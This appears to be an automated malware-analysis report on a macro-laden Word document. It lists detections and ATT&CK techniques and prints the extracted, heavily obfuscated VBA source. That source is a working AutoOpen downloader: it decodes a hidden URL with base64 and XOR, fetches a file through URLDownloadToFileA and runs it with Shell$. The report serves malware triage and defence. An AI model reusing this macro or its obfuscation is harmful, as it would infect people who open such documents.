MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon document opening. The macro utilizes the URLDownloadToFileA API to download a payload from a URL, indicating an Ingress Tool Transfer attack pattern. The specific URL used for the download is 'http://schemas.openxmlformats.org/drawingml/2006/main', although this URL is marked as benign, the presence of the download function is highly suspicious.
Heuristics 9
-
ClamAV: Doc.Macro.Obfuscated-6397052-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
pWnfWoOVygU = OZxIAzBQlKxtbGzYPN(0, VWSWKMPYtattOHpeXW(fCQsxwCiVLkowSq, "jkflsajioJIOSDFAti$@*($@t($@i*t$@I924U90G42i*g@$(gsg(sdf(G4UJPIOGDE09GERUJKLSDGFJIO4TU0924T(@$i*g$i*greiiUJ9G3402--23U9RGEU9SRGJLKDFM,.CXVBNM,.DFGS;KLDFGSHJKLUI3T4*y#$%*y%#ugtreufusdJKLSFGDIO34G9HIOBNFJKDXCVHUJDFGSHUIOGRE"), xAxvNftvdCMkk, 0, 0) Shell$ xAxvNftvdCMkk End Sub -
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Private Declare PtrSafe Function OZxIAzBQlKxtbGzYPN Lib "urlmon" Alias _ "URLDownloadToFileA" (ByVal tBvjjqcoVinerPY As Long, _ ByVal DoyTNEzoLpqBDiLEAN As String, _ -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
ByVal WIAMhCIIdWO As Long) As Long Sub AutoOpen() Dim ccHQoBknRTTxCv As Integer -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17608 bytes |
SHA-256: bd795f83e95a79fb3badddf9c19090664262c051e939f3fcc3f6232f7f4bf39f |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
233 of 315 identifiers look randomly generated (e.g. 'YHJocENZCnEcB08hGk8KJRFP') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ZwkoRPuEOeLkyd"
Option Explicit
Private Declare PtrSafe Function OZxIAzBQlKxtbGzYPN Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal tBvjjqcoVinerPY As Long, _
ByVal DoyTNEzoLpqBDiLEAN As String, _
ByVal MCdMefhZWlyFUYXWIc As String, _
ByVal mXeRtMrpBUgkHhqy As Long, _
ByVal WIAMhCIIdWO As Long) As Long
Sub AutoOpen()
Dim ccHQoBknRTTxCv As Integer
ccHQoBknRTTxCv = 1 - 9 * 7
Dim xAxvNftvdCMkk As String: xAxvNftvdCMkk = VWSWKMPYtattOHpeXW(IMkIsXtByMF("KVE6OQAEGBozGjwtPy0lHSUoRSFMBkE4EQ=="), "jkflsajioJIOSDFAti$@*($@t($@i*t$@I924U90G42i*g@$(gsg(sdf(G4UJPIOGDE09GERUJKLSDGFJIO4TU0924T(@$i*g$i*greiiUJ9G3402--23U9RGEU9SRGJLKDFM,.CXVBNM,.DFGS;KLDFGSHJKLUI3T4*y#$%*y%#ugtreufusdJKLSFGDIO34G9HIOBNFJKDXCVHUJDFGSHUIOGRE")
Dim ZBxthpHgVGq: ZBxthpHgVGq = Array("AtkyUiYHncKIfxqTf")
Dim pWnfWoOVygU
Dim McNliAvtyhdTSKmEuCz As Integer
McNliAvtyhdTSKmEuCz = 9
Dim EVLgDNRXRYFTYNeRSw As Integer
EVLgDNRXRYFTYNeRSw = 4
Dim XGnGLmaIAZad, obRcZsSgyTtkawK As Integer
XGnGLmaIAZad = 5
obRcZsSgyTtkawK = 51
While XGnGLmaIAZad < obRcZsSgyTtkawK
obRcZsSgyTtkawK = obRcZsSgyTtkawK - XGnGLmaIAZad
Wend
If EVLgDNRXRYFTYNeRSw < Len(Application.UserName) Then
Dim yOgWmRaYvwKaM: yOgWmRaYvwKaM = Array("EXQXSUUFAYQRX""ewHCrGYsgOZWUr""effhVQquJrCnxjrdRc""DWbNHjQKAXDHobL""AtrKSIBcglIERam""tmnuzVYrTZhZtZPY""TSyjTDnMsfdSxcg""ZwcQItyWYctJsX""gKHOqePxhryX")
Dim ZKUPmlbgFlCKF As Variant
End If
If McNliAvtyhdTSKmEuCz < Len(Application.UserName) Then
Dim SbGMutmffRyDZdjso As Integer
SbGMutmffRyDZdjso = 7
Dim CCCWuCkIQHViHXuZF: CCCWuCkIQHViHXuZF = Array("ucmwPHXQAdWOlN""LAIOIMyEGEmmpkUq""AwwhBAKgTZxLATd""AubDhDpqIjUfghCcom""FISDdGFmTfWITQn""QSNlBqlIgnfNxxH""TVlipfDpGsXRMsyY""KGsOPBvZEgU""LeuykfCKOwthgwn")
If SbGMutmffRyDZdjso < Len(Application.UserName) Then
Dim SLBkqnDXBbTB: SLBkqnDXBbTB = Array("syzjBCjWvmqN""mmnfaxBnDUouhKWu""IcRGOBaKOcks""vbjtOstywkMTxJpuWZ")
Dim YXMbiLJHmxpDw As Variant
End If
Dim swYbBTnacXvjHdNhsYE As Variant
End If
Dim fCQsxwCiVLkowSq As String: fCQsxwCiVLkowSq = IMkIsXtByMF("Ah8SHElORVhXf2d+YHJocENZCnEcB08hGk8KJRFP")
Dim tCEpcYKnRhwWjlwNzu, bheTCBlHesqBEtgXqZy As Integer
For bheTCBlHesqBEtgXqZy = 0 To 2
tCEpcYKnRhwWjlwNzu = tCEpcYKnRhwWjlwNzu + bheTCBlHesqBEtgXqZy
Next bheTCBlHesqBEtgXqZy
pWnfWoOVygU = OZxIAzBQlKxtbGzYPN(0, VWSWKMPYtattOHpeXW(fCQsxwCiVLkowSq, "jkflsajioJIOSDFAti$@*($@t($@i*t$@I924U90G42i*g@$(gsg(sdf(G4UJPIOGDE09GERUJKLSDGFJIO4TU0924T(@$i*g$i*greiiUJ9G3402--23U9RGEU9SRGJLKDFM,.CXVBNM,.DFGS;KLDFGSHJKLUI3T4*y#$%*y%#ugtreufusdJKLSFGDIO34G9HIOBNFJKDXCVHUJDFGSHUIOGRE"), xAxvNftvdCMkk, 0, 0)
Shell$ xAxvNftvdCMkk
End Sub
Public Function IMkIsXtByMF(kLpsvZAaOnUS As String, Optional BFCFxTCsxodMVpTegYo As Boolean = True) As String
Dim fXGWIOfuGFVidrMtfiG, tCMXisuWqWrmbg As Integer
For tCMXisuWqWrmbg = 0 To 4
fXGWIOfuGFVidrMtfiG = fXGWIOfuGFVidrMtfiG + tCMXisuWqWrmbg
Next tCMXisuWqWrmbg
Static VGGCuIQHgZcHy(0 To 255) As Byte
Dim CvFeUcTaTPYQRdDsvT As Integer
CvFeUcTaTPYQRdDsvT = 8
Dim HlxJCcNgjsSXwzut As Integer
HlxJCcNgjsSXwzut = 7 - 2 * 3
If CvFeUcTaTPYQRdDsvT < Len(Application.UserName) Then
Dim BUKqfzfNUrel, DYRaPhUkCfVztAuuWiN As Integer
BUKqfzfNUrel = 7
DYRaPhUkCfVztAuuWiN = 34
While BUKqfzfNUrel < DYRaPhUkCfVztAuuWiN
DYRaPhUkCfVztAuuWiN = DYRaPhUkCfVztAuuWiN - BUKqfzfNUrel
Wend
Dim wLtujnkDgdZlnRLAUEg As Variant
End If
Dim WnfCOlSVBDUogFFBZG() As Byte, wxQGCyuBQnqlzN() As Byte
Dim SxQBGGvFBhgfHtDZab As Integer
SxQBGGvFBhgfHtDZab = 3 - 1 * 2
Dim ALWEAcUFnwB As Long, fyBQRYCudlsdhB As Long
Dim gkXnnsVlxHAKuRaki As Integer
gkXnnsVlxHAKuRaki = 4 - 7 * 1
If VGGCuIQHgZcHy(0) = 0 Then
Dim HCwNDRiRvMlNfKNQJV As Integer
HCwNDRiRvMlNfKNQJV = 5
Dim PNgFqsxapeYDAgNSQ As Integer
PNgFqsxapeYDAgNSQ = 2
Dim dtExBYJNGtokVosyuh As Integer
dtExBYJNGtokVosyuh = 2
Dim onImPpBRvzyMrBX, AfSQzUUDDGXACybii As Integer
For AfSQzUUDDGXACybii = 0 To 7
onImPpBRvzyMrBX = onImPpBRvzyMrBX + AfSQzUUDDGXACybii
Next AfSQzUUDDGXACybii
If dtExBYJNGtokVosyuh < Len(Application.UserName) Then
Dim KTtMqLUssSwoF As Integer
KTtMqLUssSwoF = 1 - 3 * 5
Dim FvedUIkTexPzTpaOXDO As Variant
End If
If PNgFqsxapeYDAgNSQ < Len(Application.UserName) Then
Dim udKBhPnXkwPFxXqMY, KrgzqmtEeWAfKvjt As Integer
For KrgzqmtEeWAfKvjt = 0 To 1
udKBhPnXkwPFxXqMY = udKBhPnXkwPFxXqMY + KrgzqmtEeWAfKvjt
Next KrgzqmtEeWAfKvjt
Dim ccXdXFpntqxnZpMCfB As Variant
End If
If HCwNDRiRvMlNfKNQJV < Len(Application.UserName) Then
Dim vgsDdSCpnrpTfIvD: vgsDdSCpnrpTfIvD = Array("fIuPIdtvgtVGyuOpZ""UUxZqYNtWEOni""WSAyCkHgsDL""kOIXYmQwHqWbGh")
Dim JZzELENIkUEaGjRc As Variant
End If
For ALWEAcUFnwB = 0 To 255
Dim jlOIIymwkgRNoM, GCKEDFDjShLIPVeK As Integer
For GCKEDFDjShLIPVeK = 0 To 4
jlOIIymwkgRNoM = jlOIIymwkgRNoM + GCKEDFDjShLIPVeK
Next GCKEDFDjShLIPVeK
VGGCuIQHgZcHy(ALWEAcUFnwB) = 255
Dim ZtKQiadNuAsCPANDzRM As Integer
ZtKQiadNuAsCPANDzRM = 1 - 9 * 9
Next ALWEAcUFnwB
Dim SjZsJORkTlwNpQxi As Integer
SjZsJORkTlwNpQxi = 5 * 2
For ALWEAcUFnwB = 0 To 25
Dim CUrOwwrUWkFAsSP As Integer
CUrOwwrUWkFAsSP = 8
Dim RTtsLLXTgKdPhrTAp As Integer
RTtsLLXTgKdPhrTAp = 2 - 1 * 5
If CUrOwwrUWkFAsSP < Len(Application.UserName) Then
Dim EdGELopDiCcOqdVzP As Integer
EdGELopDiCcOqdVzP = 6
Dim myfnwbWZuCuAE, AXUVxszNUqzu As Integer
myfnwbWZuCuAE = 5
AXUVxszNUqzu = 62
While myfnwbWZuCuAE < AXUVxszNUqzu
AXUVxszNUqzu = AXUVxszNUqzu - myfnwbWZuCuAE
Wend
If EdGELopDiCcOqdVzP < Len(Application.UserName) Then
Dim PgMHrDqWQgV As Integer
PgMHrDqWQgV = 4
Dim BJavaplHFwfw As Integer
BJavaplHFwfw = 4 - 9 * 4
If PgMHrDqWQgV < Len(Application.UserName) Then
Dim iujlbVAYpRA As Collection
Set iujlbVAYpRA = New Collection
iujlbVAYpRA.Add "gDhsxUrBFXhsSucDL"
iujlbVAYpRA.Add "eLeVIQeeJrgzef"
iujlbVAYpRA.Add "idTAZUZCKTmpR"
iujlbVAYpRA.Add "VTIMfxGDNJCwEhc"
iujlbVAYpRA.Add "fMwLLWGGmJJ"
iujlbVAYpRA.Add "XYJWkUJbOATOQ"
iujlbVAYpRA.Add "eSIkOykCVRiWli"
iujlbVAYpRA.Add "nNTCAwlZaGGefnbJr"
Dim stQcyTrGjYKLBhB As Variant
End If
Dim JtAQXkXhIslG As Variant
End If
Dim FlxMTaitOtZegQjjw As Variant
End If
VGGCuIQHgZcHy(ALWEAcUFnwB + 65) = ALWEAcUFnwB
Next ALWEAcUFnwB
For ALWEAcUFnwB = 26 To 51
VGGCuIQHgZcHy(ALWEAcUFnwB + 71) = ALWEAcUFnwB
Dim UKetPrWLfVbf As Integer
UKetPrWLfVbf = 6 - 7 * 7
Next ALWEAcUFnwB
Dim SBCJFfjygSHA As Integer
SBCJFfjygSHA = 7 * 9
For ALWEAcUFnwB = 52 To 61
VGGCuIQHgZcHy(ALWEAcUFnwB - 4) = ALWEAcUFnwB
Dim xbedXhTZBdp As Integer
xbedXhTZBdp = 4 - 8 * 8
Next ALWEAcUFnwB
Dim JoUwumHaEBqVlSxuQU As Integer
JoUwumHaEBqVlSxuQU = 7 * 1
VGGCuIQHgZcHy(43) = 62
Dim FmWMoJMgeGIeSMw As Integer
FmWMoJMgeGIeSMw = 5 - 7 * 1
VGGCuIQHgZcHy(47) = 63
Dim mpFzoKdcaZFJXBqKb: mpFzoKdcaZFJXBqKb = Array("volIppkxnClHFKHRU")
End If
Dim sGQihnRZZWgBwvpd, HywpCWJWXcIRVP As Integer
sGQihnRZZWgBwvpd = 3
HywpCWJWXcIRVP = 78
While sGQihnRZZWgBwvpd < HywpCWJWXcIRVP
HywpCWJWXcIRVP = HywpCWJWXcIRVP - sGQihnRZZWgBwvpd
Wend
If kLpsvZAaOnUS = "" Then Exit Function
Dim HHrCMajdgVSOQzOh As Integer
HHrCMajdgVSOQzOh = 4
Dim GvCDPgxwGMtEX, wxKvbqGlqzHUCPA As Integer
For wxKvbqGlqzHUCPA = 0 To 8
GvCDPgxwGMtEX = GvCDPgxwGMtEX + wxKvbqGlqzHUCPA
Next wxKvbqGlqzHUCPA
If HHrCMajdgVSOQzOh < Len(Application.UserName) Then
Dim JexJiWILueKd As Integer
JexJiWILueKd = 2 * 7
Dim ZgecAlgyJhKa As Variant
End If
kLpsvZAaOnUS = Trim(kLpsvZAaOnUS)
Dim hPNuebkGpIPn As Integer
hPNuebkGpIPn = 2 - 6 * 8
If BFCFxTCsxodMVpTegYo Then
Dim SbZZyVjEwaUj As Integer
SbZZyVjEwaUj = 2 - 1 * 2
For ALWEAcUFnwB = 0 To 255
Dim psuapxycOUruKlp, OOevKxrSIUxgJQx As Integer
For OOevKxrSIUxgJQx = 0 To 8
psuapxycOUruKlp = psuapxycOUruKlp + OOevKxrSIUxgJQx
Next OOevKxrSIUxgJQx
If Not (Chr(ALWEAcUFnwB) Like "[A-Za-z0-9+/=]") Then
Dim eXCiZNFfutlEiLoMU, vsjlrJOEsLKXTe As Integer
eXCiZNFfutlEiLoMU = 2
vsjlrJOEsLKXTe = 28
While eXCiZNFfutlEiLoMU < vsjlrJOEsLKXTe
vsjlrJOEsLKXTe = vsjlrJOEsLKXTe - eXCiZNFfutlEiLoMU
Wend
kLpsvZAaOnUS = Replace(kLpsvZAaOnUS, Chr(ALWEAcUFnwB), "")
Dim tdiOYsDiYxyn As Integer
tdiOYsDiYxyn = 7 - 9 * 7
End If
Dim zQdfxochjhOTlus As Integer
zQdfxochjhOTlus = 3 - 4 * 8
Next ALWEAcUFnwB
Dim rqgAlIXqlXjnBSdqE As Integer
rqgAlIXqlXjnBSdqE = 1 * 5
End If
Dim jLNOxvVMhIOHoq As Integer
jLNOxvVMhIOHoq = 8 - 6 * 5
wxQGCyuBQnqlzN() = StrConv(kLpsvZAaOnUS, vbFromUnicode)
Dim lklSdXABdXpVgg As Integer
lklSdXABdXpVgg = 4 - 8 * 5
ReDim WnfCOlSVBDUogFFBZG(0 To ((Len(kLpsvZAaOnUS) \ 4) * 3 - 1))
Dim peYrbpWAUORd: peYrbpWAUORd = Array("CxXJIJfKRGawjLgXPc")
For ALWEAcUFnwB = 0 To Len(kLpsvZAaOnUS) \ 4 - 2
Dim ZVEgKLzFerBimZkVtE As Integer
ZVEgKLzFerBimZkVtE = 6
Dim PXhptxCSHYxDlRUEyx, aiGBePOCIPKyAlSoIF As Integer
For aiGBePOCIPKyAlSoIF = 0 To 8
PXhptxCSHYxDlRUEyx = PXhptxCSHYxDlRUEyx + aiGBePOCIPKyAlSoIF
Next aiGBePOCIPKyAlSoIF
If ZVEgKLzFerBimZkVtE < Len(Application.UserName) Then
Dim fyNGUEfomtNFm As Integer
fyNGUEfomtNFm = 4 - 4 * 7
Dim UyRAvFhctyeGKhLb As Variant
End If
fyBQRYCudlsdhB = VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 3))
Dim MGjrXkmuHJSRSGZVON: MGjrXkmuHJSRSGZVON = Array("JIXOYzMirsr""wGNLJkSHbmRC""ILDUXZwiLnSOm""dNOuatvyBXMxEu")
fyBQRYCudlsdhB = fyBQRYCudlsdhB Or (VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 2)) * &H40&)
Dim TDxQNcaraDUoreGsBV, fEUZxUvEndQouc As Integer
TDxQNcaraDUoreGsBV = 4
fEUZxUvEndQouc = 27
While TDxQNcaraDUoreGsBV < fEUZxUvEndQouc
fEUZxUvEndQouc = fEUZxUvEndQouc - TDxQNcaraDUoreGsBV
Wend
fyBQRYCudlsdhB = fyBQRYCudlsdhB Or (VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 1)) * &H1000&)
Dim hMOyvfmojOnokiqe: hMOyvfmojOnokiqe = Array("xKMmhAtLkJZ""JgPnzBDAAxVEIBll""LCFSzqqNKTn""xKGbgWqISYLt""FaXoHOLJsIaMxsReA""xFKbhaDmQbYUgJDQvx")
fyBQRYCudlsdhB = fyBQRYCudlsdhB Or (VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 0)) * &H40000)
Dim fxiWDCkZjxmeioVKlZ As Collection
Set fxiWDCkZjxmeioVKlZ = New Collection
fxiWDCkZjxmeioVKlZ.Add "byRFegpiphWnYpPqX"
fxiWDCkZjxmeioVKlZ.Add "pUgxNuAKmEtdrD"
fxiWDCkZjxmeioVKlZ.Add "eCaaoWjiKIOtV"
fxiWDCkZjxmeioVKlZ.Add "PgjnhoYdFGXaa"
fxiWDCkZjxmeioVKlZ.Add "lqrZDZDyPpHk"
fxiWDCkZjxmeioVKlZ.Add "FbrknsMRqnOz"
fxiWDCkZjxmeioVKlZ.Add "KoVyJxSZWob"
fxiWDCkZjxmeioVKlZ.Add "erYJEZDTiAhib"
WnfCOlSVBDUogFFBZG(ALWEAcUFnwB * 3 + 0) = (fyBQRYCudlsdhB And &HFF0000) \ &H10000
WnfCOlSVBDUogFFBZG(ALWEAcUFnwB * 3 + 1) = (fyBQRYCudlsdhB And &HFF00&) \ &H100&
Dim ZbjFypJOKbrBWQmH: ZbjFypJOKbrBWQmH = Array("DnNOvpCYZPCDDzmFo""JzFldzfAdXZNHGpLq""oHdRqWYwrcpvswtxKX""dJQoturTpKEM""NLSOuJzzmRS""dFYnerfupkzFzXuI")
WnfCOlSVBDUogFFBZG(ALWEAcUFnwB * 3 + 2) = fyBQRYCudlsdhB And &HFF&
Dim MHZmuWEuHpOwYAv, ZuCyJIYJZOqpnNGq As Integer
For ZuCyJIYJZOqpnNGq = 0 To 5
MHZmuWEuHpOwYAv = MHZmuWEuHpOwYAv + ZuCyJIYJZOqpnNGq
Next ZuCyJIYJZOqpnNGq
Next ALWEAcUFnwB
Dim nbTjdprgABlpEN, TFpTfswoxIPXitrRWYS As Integer
For TFpTfswoxIPXitrRWYS = 0 To 9
nbTjdprgABlpEN = nbTjdprgABlpEN + TFpTfswoxIPXitrRWYS
Next TFpTfswoxIPXitrRWYS
fyBQRYCudlsdhB = 0
Dim dTSyXKVYZqZRP As Integer
dTSyXKVYZqZRP = 1 * 6
If VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 3)) <> 255 Then fyBQRYCudlsdhB = VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 3))
Dim YFSlPLvaoHhIRyf, TgbyIScCPLp As Integer
For TgbyIScCPLp = 0 To 6
YFSlPLvaoHhIRyf = YFSlPLvaoHhIRyf + TgbyIScCPLp
Next TgbyIScCPLp
If VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 2)) <> 255 Then fyBQRYCudlsdhB = fyBQRYCudlsdhB Or (VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 2)) * &H40&)
Dim rvTKREKMQDpE: rvTKREKMQDpE = Array("uGHTNKwNQIoKSVIpzw""eBpqXCzidAPuUt""PlnoQuguXalmLjsHaF""SrNadaNRmjtp""CQpEYGuxnyw""AuzbBhgfOuCgjg""BWpcXZNSYDtybRGN""pVPZxbzpNSbfWrgMLbJ")
If VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 1)) <> 255 Then fyBQRYCudlsdhB = fyBQRYCudlsdhB Or (VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 1)) * &H1000&)
Dim LNTqUyKaSlwsykJNGAW As Integer
LNTqUyKaSlwsykJNGAW = 7
Dim EPkLGnSscPzky, AkBnNCSXXpsUZMjZ As Integer
EPkLGnSscPzky = 7
AkBnNCSXXpsUZMjZ = 24
While EPkLGnSscPzky < AkBnNCSXXpsUZMjZ
AkBnNCSXXpsUZMjZ = AkBnNCSXXpsUZMjZ - EPkLGnSscPzky
Wend
If LNTqUyKaSlwsykJNGAW < Len(Application.UserName) Then
Dim oCKEIpdWDZqBR: oCKEIpdWDZqBR = Array("zKoxdpttcvjiPZZY""lYrjnqGQqOtyXe""BlLlwyDQizcnj""mxhYvjmkCIP""QOJFrFjFmwfVpGB""rLXhYkWayEdeQFgi""qbhwVkmHcXIhTYNRiq""AodSXgHtHCRpMU")
Dim YmZqfAbbRjg As Variant
End If
If VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 0)) <> 255 Then fyBQRYCudlsdhB = fyBQRYCudlsdhB Or (VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 0)) * &H40000)
Dim qCJsCvfeoitfsgDg: qCJsCvfeoitfsgDg = Array("MxhfaXBUopkI""RNreNhXYxBUhjq""NQUVQTNBfxqCWgpiBv""lxLeHiZkBvwYQM""huenrApjUayipLn")
WnfCOlSVBDUogFFBZG(ALWEAcUFnwB * 3 + 0) = (fyBQRYCudlsdhB And &HFF0000) \ &H10000
Dim GyMKgdBbnuObkHbJ As Integer
GyMKgdBbnuObkHbJ = 7 * 1
WnfCOlSVBDUogFFBZG(ALWEAcUFnwB * 3 + 1) = (fyBQRYCudlsdhB And &HFF00&) \ &H100&
Dim SmFFHGGEQsbRlm As Integer
SmFFHGGEQsbRlm = 7 - 5 * 1
WnfCOlSVBDUogFFBZG(ALWEAcUFnwB * 3 + 2) = fyBQRYCudlsdhB And &HFF&
If wxQGCyuBQnqlzN(UBound(wxQGCyuBQnqlzN) - 1) = 61 Then
Dim DSzCXpYxCuOGs, rcECvohWHopXAM As Integer
DSzCXpYxCuOGs = 6
rcECvohWHopXAM = 82
While DSzCXpYxCuOGs < rcECvohWHopXAM
rcECvohWHopXAM = rcECvohWHopXAM - DSzCXpYxCuOGs
Wend
IMkIsXtByMF = Left(StrConv(WnfCOlSVBDUogFFBZG, vbUnicode), UBound(WnfCOlSVBDUogFFBZG) - 1)
Dim WHTsfIRKqKqjFkZNjM As Integer
WHTsfIRKqKqjFkZNjM = 7
Dim loYjYvcivGRqlh As Integer
loYjYvcivGRqlh = 1 - 9 * 1
If WHTsfIRKqKqjFkZNjM < Len(Application.UserName) Then
Dim GegTpOraDngTyjrx As Variant
End If
ElseIf wxQGCyuBQnqlzN(UBound(wxQGCyuBQnqlzN)) = 61 Then
IMkIsXtByMF = Left(StrConv(WnfCOlSVBDUogFFBZG, vbUnicode), UBound(WnfCOlSVBDUogFFBZG) - 0)
Else
Dim PkETfgXcJKQ, gwZrjHgrUTdIfHTSuWE As Integer
For gwZrjHgrUTdIfHTSuWE = 0 To 8
PkETfgXcJKQ = PkETfgXcJKQ + gwZrjHgrUTdIfHTSuWE
Next gwZrjHgrUTdIfHTSuWE
IMkIsXtByMF = StrConv(WnfCOlSVBDUogFFBZG, vbUnicode)
Dim TZfjRQOgQZvlaxipUar: TZfjRQOgQZvlaxipUar = Array("ohufxjtKukgH""lVhtsREXOkdPO")
End If
End Function
Public Function VWSWKMPYtattOHpeXW(ByRef TFqhqLFzwNylKPtFiz As String, ByRef fmBORyvoaQbvJmQMz As String) As String
Dim jfZYCmPNAVwnzvCD, eDmMCAhPxIUrIPrY As Integer
jfZYCmPNAVwnzvCD = 2
eDmMCAhPxIUrIPrY = 88
While jfZYCmPNAVwnzvCD < eDmMCAhPxIUrIPrY
eDmMCAhPxIUrIPrY = eDmMCAhPxIUrIPrY - jfZYCmPNAVwnzvCD
Wend
Dim tZmpsnVqXaP() As Byte, tknZhsBWZnMrGObBo() As Byte, yufAzYzaZzIcO As Long, cJcnnPQwsTOWE As Long, BwSfbkHUTjJH As Long, kLpsvZAaOnUS As Long
Dim OYlpgkSZHJsssedGK As Integer
OYlpgkSZHJsssedGK = 3 * 6
tZmpsnVqXaP = StrConv(TFqhqLFzwNylKPtFiz, vbFromUnicode)
tknZhsBWZnMrGObBo = StrConv(fmBORyvoaQbvJmQMz, vbFromUnicode)
Dim acUZRPpuPGSgPyKZ, WYeyAUebLzQ As Integer
acUZRPpuPGSgPyKZ = 5
WYeyAUebLzQ = 32
While acUZRPpuPGSgPyKZ < WYeyAUebLzQ
WYeyAUebLzQ = WYeyAUebLzQ - acUZRPpuPGSgPyKZ
Wend
yufAzYzaZzIcO = UBound(tZmpsnVqXaP)
Dim LaAVeVNCzoRfPcq As Integer
LaAVeVNCzoRfPcq = 8 - 3 * 2
cJcnnPQwsTOWE = UBound(tknZhsBWZnMrGObBo)
Dim lmbPdXpLWjQKJ, MRzEluliKrtd As Integer
For MRzEluliKrtd = 0 To 5
lmbPdXpLWjQKJ = lmbPdXpLWjQKJ + MRzEluliKrtd
Next MRzEluliKrtd
For BwSfbkHUTjJH = 0 To yufAzYzaZzIcO
Dim vKcEpSnMOhvVVGVxdq As Integer
vKcEpSnMOhvVVGVxdq = 2
Dim FqmJVrqZDQy As Collection
Set FqmJVrqZDQy = New Collection
FqmJVrqZDQy.Add "kIKDSyooLABxXYv"
FqmJVrqZDQy.Add "MJNysgmzskyzpGwSt"
FqmJVrqZDQy.Add "fhcrescYEZNq"
FqmJVrqZDQy.Add "GMAoRqOlxyKgvn"
FqmJVrqZDQy.Add "TnGFSHAkVEzkETh"
FqmJVrqZDQy.Add "huBMUkEObQjsM"
FqmJVrqZDQy.Add "zKxOZZLRvgAQqYU"
FqmJVrqZDQy.Add "ncFlenIAGLE"
If vKcEpSnMOhvVVGVxdq < Len(Application.UserName) Then
Dim PkwhxOJKAzOtrtEGFaR As Integer
PkwhxOJKAzOtrtEGFaR = 7 * 1
Dim zOWEHAEyullrmxYDcBM As Variant
End If
tZmpsnVqXaP(BwSfbkHUTjJH) = tZmpsnVqXaP(BwSfbkHUTjJH) Xor tknZhsBWZnMrGObBo(kLpsvZAaOnUS)
Dim MUDsEkQKuNeQiyvECI As Integer
MUDsEkQKuNeQiyvECI = 4 * 1
If kLpsvZAaOnUS < cJcnnPQwsTOWE Then
kLpsvZAaOnUS = kLpsvZAaOnUS + 1
Else
Dim AecHGNEjAhlXJAlDJA As Integer
AecHGNEjAhlXJAlDJA = 8 * 4
kLpsvZAaOnUS = 0
Dim NBvQfjcCSGT As Integer
NBvQfjcCSGT = 2 * 9
End If
Dim aoFvIukXkPlhNNFFwv: aoFvIukXkPlhNNFFwv = Array("IeqOSsNRlhLRwhMaG""VbknkFevsBmcUsN""ECQmOLEAWwu""ZGdeCreWfWKGjIhrPjm""goyAuInSeFHkPyCk""vZkSkRQkdOe")
Next BwSfbkHUTjJH
Dim sSfdIiqDBQCWT, ogzFkEasMihQU As Integer
For ogzFkEasMihQU = 0 To 3
sSfdIiqDBQCWT = sSfdIiqDBQCWT + ogzFkEasMihQU
Next ogzFkEasMihQU
VWSWKMPYtattOHpeXW = StrConv(tZmpsnVqXaP, vbUnicode)
End Function
Attribute VB_Name = "ZhjKqcXuixfG"
Attribute VB_Base = "0{DEA8588D-7CB0-4728-BFC1-4EFA34A8DD63}{41D2E52E-A43B-43C8-8884-7AA2FA11E92E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function edIfCsfPNNFA() As String
